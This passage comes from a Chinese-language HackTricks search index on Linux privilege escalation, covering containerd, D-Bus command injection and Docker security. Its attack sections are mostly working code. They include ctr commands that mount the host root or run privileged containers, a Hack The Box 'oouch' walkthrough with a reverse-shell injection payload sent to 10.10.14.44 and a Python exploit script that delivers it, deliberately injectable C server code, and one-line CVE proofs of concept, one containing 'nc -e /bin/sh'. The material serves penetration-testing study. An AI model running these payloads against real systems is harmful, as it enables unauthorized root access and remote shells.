@hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Cisco - vmanage » Path 2","id":"1518","title":"Path 2"},"1519":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Containerd (ctr) Privilege Escalation » Containerd (ctr) 提权","id":"1519","title":"Containerd (ctr) 提权"},"152":{"body":"Bettercap broadcast packets to the port 137/UDP asking for the name \\"CKAAAAAAAAAAAAAAAAAAAAAAAAAAA\\".","breadcrumbs":"Pentesting Network » NBNS (NetBios Name Server)","id":"152","title":"NBNS (NetBios Name Server)"},"1520":{"body":"访问以下链接了解 什么是 containerd 和 ctr: 2375, 2376 Pentesting Docker","breadcrumbs":"Linux Privilege Escalation » Containerd (ctr) Privilege Escalation » 基本信息","id":"1520","title":"基本信息"},"1521":{"body":"如果你发现主机包含 ctr 命令: bash which ctr\\n/usr/bin/ctr 您可以列出图像: bash ctr image list\\nREF TYPE DIGEST SIZE PLATFORMS LABELS\\nregistry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -\\nregistry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 - 然后 运行其中一个镜像,将主机根文件夹挂载到它上 : bash ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Containerd (ctr) Privilege Escalation » PE 1","id":"1521","title":"PE 1"},"1522":{"body":"运行一个特权容器并从中逃逸。 您可以通过以下方式运行特权容器: bash ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash 然后您可以使用以下页面中提到的一些技术来 利用特权能力逃脱 : Docker Security tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Containerd (ctr) Privilege Escalation » PE 2","id":"1522","title":"PE 2"},"1523":{"body":"Reading time: 24 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation","id":"1523","title":"D-Bus Enumeration & Command Injection Privilege Escalation"},"1524":{"body":"D-Bus 被用作 Ubuntu 桌面环境中的进程间通信 (IPC) 中介。在 Ubuntu 中,观察到多个消息总线的并发操作:系统总线,主要用于 特权服务以暴露与系统相关的服务 ,以及每个登录用户的会话总线,仅暴露与该特定用户相关的服务。这里的重点主要是系统总线,因为它与以更高特权(例如,root)运行的服务相关,我们的目标是提升特权。值得注意的是,D-Bus 的架构为每个会话总线采用了一个“路由器”,负责根据客户端为其希望与之通信的服务指定的地址,将客户端消息重定向到适当的服务。 D-Bus 上的服务由它们暴露的 对象 和 接口 定义。对象可以类比于标准 OOP 语言中的类实例,每个实例通过 对象路径 唯一标识。该路径类似于文件系统路径,唯一标识服务暴露的每个对象。一个关键的研究接口是 org.freedesktop.DBus.Introspectable 接口,具有一个方法 Introspect。该方法返回对象支持的方法、信号和属性的 XML 表示,这里重点关注方法,同时省略属性和信号。 为了与 D-Bus 接口进行通信,使用了两个工具:一个名为 gdbus 的 CLI 工具,用于在脚本中轻松调用 D-Bus 暴露的方法,以及 D-Feet ,一个基于 Python 的 GUI 工具,旨在枚举每个总线上可用的服务并显示每个服务中包含的对象。 bash sudo apt-get install d-feet https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png 在第一张图片中,显示了注册到 D-Bus 系统总线的服务,特别是在选择系统总线按钮后突出显示了 org.debin.apt 。D-Feet 查询此服务以获取对象,显示所选对象的接口、方法、属性和信号,如第二张图片所示。每个方法的签名也有详细说明。 一个显著的特点是显示服务的 进程 ID (pid) 和 命令行 ,这对于确认服务是否以提升的权限运行非常有用,这对研究的相关性很重要。 D-Feet 还允许方法调用 :用户可以输入 Python 表达式作为参数,D-Feet 会将其转换为 D-Bus 类型,然后传递给服务。 但是,请注意 某些方法需要身份验证 ,才能允许我们调用它们。我们将忽略这些方法,因为我们的目标是首先在没有凭据的情况下提升我们的权限。 还要注意,某些服务会查询另一个名为 org.freedeskto.PolicyKit1 的 D-Bus 服务,以确定用户是否应该被允许执行某些操作。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » GUI enumeration","id":"1524","title":"GUI enumeration"},"1525":{"body":"","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 命令行枚举","id":"1525","title":"命令行枚举"},"1526":{"body":"可以使用以下命令列出打开的 D-Bus 接口: bash busctl list #List D-Bus interfaces NAME PID PROCESS USER CONNECTION UNIT SE\\n:1.0 1 systemd root :1.0 init.scope -\\n:1.1345 12817 busctl qtc :1.1345 session-729.scope 72\\n:1.2 1576 systemd-timesyn systemd-timesync :1.2 systemd-timesyncd.service -\\n:1.3 2609 dbus-server root :1.3 dbus-server.service -\\n:1.4 2606 wpa_supplicant root :1.4 wpa_supplicant.service -\\n:1.6 2612 systemd-logind root :1.6 systemd-logind.service -\\n:1.8 3087 unattended-upgr root :1.8 unattended-upgrades.serv… -\\n:1.820 6583 systemd qtc :1.820 user@1000.service -\\ncom.ubuntu.SoftwareProperties - - - (activatable) - -\\nfi.epitest.hostap.WPASupplicant 2606 wpa_supplicant root :1.4 wpa_supplicant.service -\\nfi.w1.wpa_supplicant1 2606 wpa_supplicant root :1.4 wpa_supplicant.service -\\nhtb.oouch.Block 2609 dbus-server root :1.3 dbus-server.service -\\norg.bluez - - - (activatable) - -\\norg.freedesktop.DBus 1 systemd root - init.scope -\\norg.freedesktop.PackageKit - - - (activatable) - -\\norg.freedesktop.PolicyKit1 - - - (activatable) - -\\norg.freedesktop.hostname1 - - - (activatable) - -\\norg.freedesktop.locale1 - - - (activatable) - - 连接 来自维基百科: 当一个进程建立与总线的连接时,总线会为该连接分配一个称为 唯一连接名称 的特殊总线名称。这种类型的总线名称是不可变的——只要连接存在,就保证它们不会改变——更重要的是,它们在总线的生命周期内不能被重用。这意味着,即使同一个进程关闭与总线的连接并创建一个新的连接,也不会有其他连接被分配这样的唯一连接名称。唯一连接名称很容易识别,因为它们以——否则被禁止的——冒号字符开头。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 列出服务对象","id":"1526","title":"列出服务对象"},"1527":{"body":"然后,您可以通过以下方式获取有关接口的一些信息: bash busctl status htb.oouch.Block #Get info of \\"htb.oouch.Block\\" interface PID=2609\\nPPID=1\\nTTY=n/a\\nUID=0\\nEUID=0\\nSUID=0\\nFSUID=0\\nGID=0\\nEGID=0\\nSGID=0\\nFSGID=0\\nSupplementaryGIDs=\\nComm=dbus-server\\nCommandLine=/root/dbus-server\\nLabel=unconfined\\nCGroup=/system.slice/dbus-server.service\\nUnit=dbus-server.service\\nSlice=system.slice\\nUserUnit=n/a\\nUserSlice=n/a\\nSession=n/a\\nAuditLoginUID=n/a\\nAuditSessionID=n/a\\nUniqueName=:1.3\\nEffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search\\ncap_fowner cap_fsetid cap_kill cap_setgid\\ncap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service\\ncap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock\\ncap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot\\ncap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot\\ncap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config\\ncap_mknod cap_lease cap_audit_write cap_audit_control\\ncap_setfcap cap_mac_override cap_mac_admin cap_syslog\\ncap_wake_alarm cap_block_suspend cap_audit_read\\nPermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search\\ncap_fowner cap_fsetid cap_kill cap_setgid\\ncap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service\\ncap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock\\ncap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot\\ncap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot\\ncap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config\\ncap_mknod cap_lease cap_audit_write cap_audit_control\\ncap_setfcap cap_mac_override cap_mac_admin cap_syslog\\ncap_wake_alarm cap_block_suspend cap_audit_read\\nInheritableCapabilities=\\nBoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search\\ncap_fowner cap_fsetid cap_kill cap_setgid\\ncap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service\\ncap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock\\ncap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot\\ncap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot\\ncap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config\\ncap_mknod cap_lease cap_audit_write cap_audit_control\\ncap_setfcap cap_mac_override cap_mac_admin cap_syslog\\ncap_wake_alarm cap_block_suspend cap_audit_read","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 服务对象信息","id":"1527","title":"服务对象信息"},"1528":{"body":"您需要拥有足够的权限。 bash busctl tree htb.oouch.Block #Get Interfaces of the service object └─/htb\\n└─/htb/oouch\\n└─/htb/oouch/Block","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 列出服务对象的接口","id":"1528","title":"列出服务对象的接口"},"1529":{"body":"注意在这个例子中,选择了使用 tree 参数发现的最新接口( 见前一部分 ): bash busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface NAME TYPE SIGNATURE RESULT/VALUE FLAGS\\nhtb.oouch.Block interface - - -\\n.Block method s s -\\norg.freedesktop.DBus.Introspectable interface - - -\\n.Introspect method - s -\\norg.freedesktop.DBus.Peer interface - - -\\n.GetMachineId method - s -\\n.Ping method - - -\\norg.freedesktop.DBus.Properties interface - - -\\n.Get method ss v -\\n.GetAll method s a{sv} -\\n.Set method ssv - -\\n.PropertiesChanged signal sa{sv}as - - 注意接口 htb.oouch.Block 的方法 .Block(我们感兴趣的那个)。其他列的 \\"s\\" 可能意味着它期望一个字符串。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » Introspect Interface of a Service Object","id":"1529","title":"Introspect Interface of a Service Object"},"153":{"body":"Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 1900).","breadcrumbs":"Pentesting Network » SSDP (Simple Service Discovery Protocol)","id":"153","title":"SSDP (Simple Service Discovery Protocol)"},"1530":{"body":"拥有足够的权限(仅有 send_destination 和 receive_sender 权限是不够的)你可以 监控 D-Bus 通信 。 为了 监控 一次 通信 你需要是 root 。如果你在成为 root 时仍然遇到问题,请查看 https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/ 和 https://wiki.ubuntu.com/DebuggingDBus warning 如果你知道如何配置 D-Bus 配置文件以 允许非 root 用户嗅探 通信,请 联系我 ! 监控的不同方法: bash sudo busctl monitor htb.oouch.Block #Monitor only specified\\nsudo busctl monitor #System level, even if this works you will only see messages you have permissions to see\\nsudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see 在以下示例中,接口 htb.oouch.Block 被监控,并且 消息 \\" lalalalal \\" 通过误传发送 : bash busctl monitor htb.oouch.Block Monitoring bus message stream.\\n‣ Type=method_call Endian=l Flags=0 Version=1 Priority=0 Cookie=2\\nSender=:1.1376 Destination=htb.oouch.Block Path=/htb/oouch/Block Interface=htb.oouch.Block Member=Block\\nUniqueName=:1.1376\\nMESSAGE \\"s\\" {\\nSTRING \\"lalalalal\\";\\n}; ‣ Type=method_return Endian=l Flags=1 Version=1 Priority=0 Cookie=16 ReplyCookie=2\\nSender=:1.3 Destination=:1.1376\\nUniqueName=:1.3\\nMESSAGE \\"s\\" {\\nSTRING \\"Carried out :D\\";\\n}; 您可以使用 capture 代替 monitor 将结果保存到 pcap 文件中。 过滤所有噪音 如果总线上的信息太多,请传递一个匹配规则,如下所示: bash dbus-monitor \\"type=signal,sender=\'org.gnome.TypingMonitor\',interface=\'org.gnome.TypingMonitor\'\\" 可以指定多个规则。如果消息匹配_任何_规则,消息将被打印。像这样: bash dbus-monitor \\"type=error\\" \\"sender=org.freedesktop.SystemToolsBackends\\" bash dbus-monitor \\"type=method_call\\" \\"type=method_return\\" \\"type=error\\" 查看 D-Bus文档 以获取有关匹配规则语法的更多信息。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 监控/捕获接口","id":"1530","title":"监控/捕获接口"},"1531":{"body":"busctl 还有更多选项, 在这里找到所有选项 。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 更多","id":"1531","title":"更多"},"1532":{"body":"作为用户 qtc 在 HTB 的主机 \\"oouch\\" 内 ,您可以找到一个位于 /etc/dbus-1/system.d/htb.oouch.Block.conf 的 意外 D-Bus 配置文件 : xml \\n\\n \\n\\n\\n 注意从之前的配置中, 您需要是用户 root 或 www-data 才能通过此 D-BUS 通信发送和接收信息 。 作为用户 qtc 在 docker 容器 aeb4525789d8 内,您可以在文件 /code/oouch/routes.py 中找到一些与 dbus 相关的代码。这是有趣的代码: python if primitive_xss.search(form.textfield.data):\\nbus = dbus.SystemBus()\\nblock_object = bus.get_object(\'htb.oouch.Block\', \'/htb/oouch/Block\')\\nblock_iface = dbus.Interface(block_object, dbus_interface=\'htb.oouch.Block\') client_ip = request.environ.get(\'REMOTE_ADDR\', request.remote_addr)\\nresponse = block_iface.Block(client_ip)\\nbus.close()\\nreturn render_template(\'hacker.html\', title=\'Hacker\') 如您所见,它正在 连接到 D-Bus 接口 并将“client_ip”发送到**“Block”函数**。 在 D-Bus 连接的另一端,有一些 C 编译的二进制文件在运行。此代码正在 监听 D-Bus 连接 以获取 IP 地址,并通过 system 函数调用 iptables 来阻止给定的 IP 地址。 对 system 的调用故意存在命令注入漏洞 ,因此像以下这样的有效载荷将创建一个反向 shell:;bash -c \'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1\' #","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 易受攻击的场景","id":"1532","title":"易受攻击的场景"},"1533":{"body":"在本页的末尾,您可以找到 D-Bus 应用程序的完整 C 代码 。在其中,您可以在第 91-97 行之间找到 如何注册 D-Bus 对象路径 和 接口名称 。此信息将是发送信息到 D-Bus 连接所必需的: c /* Install the object */\\nr = sd_bus_add_object_vtable(bus,\\n&slot,\\n\\"/htb/oouch/Block\\", /* interface */\\n\\"htb.oouch.Block\\", /* service object */\\nblock_vtable,\\nNULL); 此外,在第57行中,您可以发现 为此D-Bus通信注册的唯一方法 称为Block( 这就是为什么在接下来的部分中,负载将发送到服务对象htb.oouch.Block、接口/htb/oouch/Block和方法名Block ): c SD_BUS_METHOD(\\"Block\\", \\"s\\", \\"s\\", method_block, SD_BUS_VTABLE_UNPRIVILEGED), Python 以下Python代码将通过block_iface.Block(runme)将有效负载发送到D-Bus连接的Block方法( 请注意,它是从前面的代码块中提取的 ): python import dbus\\nbus = dbus.SystemBus()\\nblock_object = bus.get_object(\'htb.oouch.Block\', \'/htb/oouch/Block\')\\nblock_iface = dbus.Interface(block_object, dbus_interface=\'htb.oouch.Block\')\\nrunme = \\";bash -c \'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1\' #\\"\\nresponse = block_iface.Block(runme)\\nbus.close() busctl 和 dbus-send bash dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:\';pring -c 1 10.10.14.44 #\' dbus-send 是一个用于向“消息总线”发送消息的工具。 消息总线 – 一种软件,系统通过它使应用程序之间的通信变得简单。它与消息队列相关(消息按顺序排列),但在消息总线中,消息以订阅模型发送,并且速度非常快。 “-system” 标签用于表示这是一个系统消息,而不是会话消息(默认情况下)。 “–print-reply” 标签用于适当地打印我们的消息,并以人类可读的格式接收任何回复。 “–dest=Dbus-Interface-Block” Dbus 接口的地址。 “–string:” – 我们希望发送到接口的消息类型。有几种发送消息的格式,如双精度、字节、布尔值、整数、对象路径。在这些中,“对象路径”在我们想要将文件路径发送到 Dbus 接口时非常有用。在这种情况下,我们可以使用一个特殊文件(FIFO)来以文件名的形式将命令传递给接口。“string:;” – 这是为了再次调用对象路径,我们放置 FIFO 反向 shell 文件/命令。 请注意,在 htb.oouch.Block.Block 中,第一部分(htb.oouch.Block)引用服务对象,最后一部分(.Block)引用方法名称。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 利用它","id":"1533","title":"利用它"},"1534":{"body":"d-bus_server.c //sudo apt install pkgconf\\n//sudo apt install libsystemd-dev\\n//gcc d-bus_server.c -o dbus_server `pkg-config --cflags --libs libsystemd` #include \\n#include \\n#include \\n#include \\n#include \\n#include static int method_block(sd_bus_message *m, void *userdata, sd_bus_error *ret_error) {\\nchar* host = NULL;\\nint r; /* Read the parameters */\\nr = sd_bus_message_read(m, \\"s\\", &host);\\nif (r < 0) {\\nfprintf(stderr, \\"Failed to obtain hostname: %s\\\\n\\", strerror(-r));\\nreturn r;\\n} char command[] = \\"iptables -A PREROUTING -s %s -t mangle -j DROP\\"; int command_len = strlen(command);\\nint host_len = strlen(host); char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char));\\nif(command_buffer == NULL) {\\nfprintf(stderr, \\"Failed to allocate memory\\\\n\\");\\nreturn -1;\\n} sprintf(command_buffer, command, host); /* In the first implementation, we simply ran command using system(), since the expected DBus\\n* to be threading automatically. However, DBus does not thread and the application will hang\\n* forever if some user spawns a shell. Thefore we need to fork (easier than implementing real\\n* multithreading)\\n*/\\nint pid = fork(); if ( pid == 0 ) {\\n/* Here we are in the child process. We execute the command and eventually exit. */\\nsystem(command_buffer);\\nexit(0);\\n} else {\\n/* Here we are in the parent process or an error occured. We simply send a genric message.\\n* In the first implementation we returned separate error messages for success or failure.\\n* However, now we cannot wait for results of the system call. Therefore we simply return\\n* a generic. */\\nreturn sd_bus_reply_method_return(m, \\"s\\", \\"Carried out :D\\");\\n}\\nr = system(command_buffer);\\n} /* The vtable of our little object, implements the net.poettering.Calculator interface */\\nstatic const sd_bus_vtable block_vtable[] = {\\nSD_BUS_VTABLE_START(0),\\nSD_BUS_METHOD(\\"Block\\", \\"s\\", \\"s\\", method_block, SD_BUS_VTABLE_UNPRIVILEGED),\\nSD_BUS_VTABLE_END\\n}; int main(int argc, char *argv[]) {\\n/*\\n* Main method, registeres the htb.oouch.Block service on the system dbus.\\n*\\n* Paramaters:\\n* argc (int) Number of arguments, not required\\n* argv[] (char**) Argument array, not required\\n*\\n* Returns:\\n* Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive\\n* as long as the user keeps it alive.\\n*/ /* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */\\nsignal(SIGCHLD,SIG_IGN); sd_bus_slot *slot = NULL;\\nsd_bus *bus = NULL;\\nint r; /* First we need to connect to the system bus. */\\nr = sd_bus_open_system(&bus);\\nif (r < 0)\\n{\\nfprintf(stderr, \\"Failed to connect to system bus: %s\\\\n\\", strerror(-r));\\ngoto finish;\\n} /* Install the object */\\nr = sd_bus_add_object_vtable(bus,\\n&slot,\\n\\"/htb/oouch/Block\\", /* interface */\\n\\"htb.oouch.Block\\", /* service object */\\nblock_vtable,\\nNULL);\\nif (r < 0) {\\nfprintf(stderr, \\"Failed to install htb.oouch.Block: %s\\\\n\\", strerror(-r));\\ngoto finish;\\n} /* Register the service name to find out object */\\nr = sd_bus_request_name(bus, \\"htb.oouch.Block\\", 0);\\nif (r < 0) {\\nfprintf(stderr, \\"Failed to acquire service name: %s\\\\n\\", strerror(-r));\\ngoto finish;\\n} /* Infinite loop to process the client requests */\\nfor (;;) {\\n/* Process requests */\\nr = sd_bus_process(bus, NULL);\\nif (r < 0) {\\nfprintf(stderr, \\"Failed to process bus: %s\\\\n\\", strerror(-r));\\ngoto finish;\\n}\\nif (r > 0) /* we processed a request, try to process another one, right-away */\\ncontinue; /* Wait for the next request to process */\\nr = sd_bus_wait(bus, (uint64_t) -1);\\nif (r < 0) {\\nfprintf(stderr, \\"Failed to wait on bus: %s\\\\n\\", strerror(-r));\\ngoto finish;\\n}\\n} finish:\\nsd_bus_slot_unref(slot);\\nsd_bus_unref(bus); return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;\\n}","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » C code","id":"1534","title":"C code"},"1535":{"body":"手动使用 busctl/gdbus 枚举大型 D-Bus 攻击面很快变得痛苦。近年来发布的两个小型 FOSS 工具可以在红队或 CTF 参与中加快速度:","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 自动化枚举助手 (2023-2025)","id":"1535","title":"自动化枚举助手 (2023-2025)"},"1536":{"body":"作者: @taviso – https://github.com/taviso/dbusmap 用 C 编写;单个静态二进制文件 (<50 kB),遍历每个对象路径,提取 Introspect XML 并将其映射到拥有的 PID/UID。 有用的标志: bash # 列出 *系统* 总线上的每个服务并转储所有可调用的方法\\nsudo dbus-map --dump-methods # 主动探测可以在没有 Polkit 提示的情况下访问的方法/属性\\nsudo dbus-map --enable-probes --null-agent --dump-methods --dump-properties 该工具用 ! 标记未受保护的知名名称,立即揭示您可以 拥有 (接管)或从非特权 shell 可达的方法调用的服务。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » dbusmap (\\"D-Bus 的 Nmap\\")","id":"1536","title":"dbusmap (\\"D-Bus 的 Nmap\\")"},"1537":{"body":"作者: @initstring – https://github.com/initstring/uptux 仅用 Python 编写的脚本,查找 systemd 单元中的 可写 路径 和 过于宽松的 D-Bus 策略文件(例如 send_destination=\\"*\\")。 快速使用: bash python3 uptux.py -n # 运行所有检查但不写入日志文件\\npython3 uptux.py -d # 启用详细调试输出 D-Bus 模块搜索以下目录,并突出显示任何可以被普通用户伪造或劫持的服务: /etc/dbus-1/system.d/ 和 /usr/share/dbus-1/system.d/ /etc/dbus-1/system-local.d/(供应商覆盖)","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » uptux.py","id":"1537","title":"uptux.py"},"1538":{"body":"关注最近发布的 CVE 有助于发现自定义代码中类似的不安全模式。以下高影响的本地 EoP 问题均源于 系统总线 上缺失的身份验证/授权: 年份 CVE 组件 根本原因 一行 PoC 2024 CVE-2024-45752 logiops ≤ 0.3.4 (Logitech HID 守护进程) logid 系统服务暴露了一个不受限制的 org.freedesktop.Logiopsd 接口,允许 任何 用户更改设备配置文件并通过宏字符串注入任意 shell 命令。 gdbus call -y -d org.freedesktop.Logiopsd -o /org/freedesktop/Logiopsd -m org.freedesktop.Logiopsd.LoadConfig \\"/tmp/pwn.yml\\" 2025 CVE-2025-23222 Deepin dde-api-proxy ≤ 1.0.18 以 root 身份运行的代理将遗留总线名称转发到后端服务 而不转发调用者 UID/Polkit 上下文 ,因此每个转发请求都被视为 UID 0。 gdbus call -y -d com.deepin.daemon.Grub2 -o /com/deepin/daemon/Grub2 -m com.deepin.daemon.Grub2.SetTimeout 1 2025 CVE-2025-3931 Red Hat Insights yggdrasil ≤ 0.4.6 公共 Dispatch 方法缺乏任何 ACL → 攻击者可以命令 包管理器 工作线程安装任意 RPM。 dbus-send --system --dest=com.redhat.yggdrasil /com/redhat/Dispatch com.redhat.yggdrasil.Dispatch string:\'{\\"worker\\":\\"pkg\\",\\"action\\":\\"install\\",\\"pkg\\":\\"nc -e /bin/sh\\"}\' 需要注意的模式: 服务在 系统总线 上以 root 身份运行。 没有 PolicyKit 检查(或被代理绕过)。 方法最终导致 system()/包安装/设备重新配置 → 代码执行。 使用 dbusmap --enable-probes 或手动 busctl call 确认补丁是否回溯了适当的 polkit_authority_check_authorization() 逻辑。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 显著的 D-Bus 权限提升漏洞 (2024-2025)","id":"1538","title":"显著的 D-Bus 权限提升漏洞 (2024-2025)"},"1539":{"body":"搜索世界可写或 发送/接收 开放的策略: bash grep -R --color -nE \': snyk bash snyk container test --json-file-output= --severity-threshold=high clair-scanner bash clair-scanner -w example-alpine.yaml --ip YOUR_LOCAL_IP alpine:3.5","breadcrumbs":"Linux Privilege Escalation » Docker Security » 镜像扫描","id":"1545","title":"镜像扫描"},"1546":{"body":"Docker 镜像签名确保了在容器中使用的镜像的安全性和完整性。以下是简要说明: Docker 内容信任 利用 Notary 项目,基于更新框架 (TUF),来管理镜像签名。有关更多信息,请参见 Notary 和 TUF 。 要激活 Docker 内容信任,请设置 export DOCKER_CONTENT_TRUST=1。此功能在 Docker 版本 1.10 及更高版本中默认关闭。 启用此功能后,仅可以下载签名的镜像。初始镜像推送需要为根密钥和标记密钥设置密码短语,Docker 还支持 Yubikey 以增强安全性。更多详细信息可以在 这里 找到。 尝试在启用内容信任的情况下拉取未签名的镜像会导致 \\"No trust data for latest\\" 错误。 在第一次之后的镜像推送中,Docker 会要求输入存储库密钥的密码短语以签署镜像。 要备份您的私钥,请使用以下命令: bash tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private 在切换 Docker 主机时,必须移动根和存储库密钥以维持操作。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker 镜像签名","id":"1546","title":"Docker 镜像签名"},"1547":{"body":"容器安全特性摘要 主要进程隔离特性 在容器化环境中,隔离项目及其进程对于安全和资源管理至关重要。以下是关键概念的简化解释: 命名空间 目的 :确保进程、网络和文件系统等资源的隔离。特别是在 Docker 中,命名空间使容器的进程与主机和其他容器分开。 unshare 的使用 :unshare 命令(或底层系统调用)用于创建新的命名空间,提供额外的隔离层。然而,虽然 Kubernetes 本身并不阻止这一点,但 Docker 是会的。 限制 :创建新命名空间不允许进程恢复到主机的默认命名空间。要穿透主机命名空间,通常需要访问主机的 /proc 目录,使用 nsenter 进行进入。 控制组 (CGroups) 功能 :主要用于在进程之间分配资源。 安全方面 :CGroups 本身不提供隔离安全,除了 release_agent 特性,如果配置错误,可能会被利用进行未经授权的访问。 能力丢弃 重要性 :这是进程隔离的重要安全特性。 功能 :通过丢弃某些能力来限制根进程可以执行的操作。即使进程以根权限运行,缺乏必要的能力也会阻止其执行特权操作,因为系统调用将因权限不足而失败。 这些是进程丢弃其他能力后的 剩余能力 : Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep Seccomp 它在 Docker 中默认启用。它有助于 进一步限制进程可以调用的系统调用 。 默认的 Docker Seccomp 配置文件 可以在 https://github.com/moby/moby/blob/master/profiles/seccomp/default.json 找到。 AppArmor Docker 有一个可以激活的模板: https://github.com/moby/moby/tree/master/profiles/apparmor 这将允许减少能力、系统调用、对文件和文件夹的访问...","breadcrumbs":"Linux Privilege Escalation » Docker Security » 容器安全特性","id":"1547","title":"容器安全特性"},"1548":{"body":"Namespaces 是 Linux 内核的一个特性,它 将内核资源进行分区 ,使得一组 进程****看到 一组 资源 ,而 另一 组 进程 看到 不同 的资源集。该特性通过为一组资源和进程使用相同的命名空间来工作,但这些命名空间指向不同的资源。资源可以存在于多个空间中。 Docker 利用以下 Linux 内核命名空间来实现容器隔离: pid namespace mount namespace network namespace ipc namespace UTS namespace 有关 命名空间的更多信息 ,请查看以下页面: Namespaces","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces","id":"1548","title":"Namespaces"},"1549":{"body":"Linux 内核特性 cgroups 提供了 限制一组进程的资源,如 CPU、内存、IO、网络带宽 的能力。Docker 允许使用 cgroup 特性创建容器,从而实现对特定容器的资源控制。 以下是一个用户空间内存限制为 500m,内核内存限制为 50m,CPU 共享为 512,blkio-weight 为 400 的容器。CPU 共享是控制容器 CPU 使用的比率。它的默认值为 1024,范围在 0 到 1024 之间。如果三个容器的 CPU 